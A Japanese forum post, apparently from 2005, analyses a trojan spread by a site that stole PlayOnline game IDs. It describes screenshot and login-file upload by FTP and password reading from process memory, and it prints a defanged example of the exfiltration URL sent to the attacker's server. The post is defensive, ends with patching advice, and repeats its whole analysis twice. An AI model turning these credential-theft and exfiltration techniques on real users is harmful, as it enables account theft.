【中国産】POLID盗難罠サイト
304 :既にその名前は使われています:
サイトが無力化されたいま、もうどうでもいいかもしれないけど、トロイの
バイナリを逆アセして推測した挙動を報告しとく。
・POLのSSが撮れればFTPでうぷ。ファイル名は日付時間から生成
ファイル名の例:20051024152020471u.bmp
・POL IDを収めたlogin_w.binを読み出せればFTPでうぷ
ファイル名の例:20051024152025339u.bin
・POLのプロセスが使うメモリからPOLのパスワードの読み出しを試みる
・Windows 98かどうかをチェック(なぜに?)
・サイトに仕掛けてあったASPにアクセスしてSSとlogin_w.binのファ
イル名、読み出したPOLのパスワード、IPアドレス、Win98かどうかを送信
例:http://www●japan213●com/ff11929/ff11.asp?name=bmp/2005102415
2020471u.bmp&passmem=pAsSwOrD&binfile=bin/20051024152025339u.b
in&ip=192.168.0.1&is98=yes
・login_w.binとPOLのパスワードをSQL Serverに送信しているっぽいルーチ
もある(よく分からない)
感染防止策としては、Windows Updateをこまめにすること。Windowsの自動更
新を有効にするのもよし。こういうトロイに対してはウイルス対策ソフトには
あまり期待できないね。
バイナリを逆アセして推測した挙動を報告しとく。
・POLのSSが撮れればFTPでうぷ。ファイル名は日付時間から生成
ファイル名の例:20051024152020471u.bmp
・POL IDを収めたlogin_w.binを読み出せればFTPでうぷ
ファイル名の例:20051024152025339u.bin
・POLのプロセスが使うメモリからPOLのパスワードの読み出しを試みる
・Windows 98かどうかをチェック(なぜに?)
・サイトに仕掛けてあったASPにアクセスしてSSとlogin_w.binのファ
イル名、読み出したPOLのパスワード、IPアドレス、Win98かどうかを送信
例:http://www●japan213●com/ff11929/ff11.asp?name=bmp/2005102415
2020471u.bmp&passmem=pAsSwOrD&binfile=bin/20051024152025339u.b
in&ip=192.168.0.1&is98=yes
・login_w.binとPOLのパスワードをSQL Serverに送信しているっぽいルーチ
もある(よく分からない)
感染防止策としては、Windows Updateをこまめにすること。Windowsの自動更
新を有効にするのもよし。こういうトロイに対してはウイルス対策ソフトには
あまり期待できないね。
|
|
|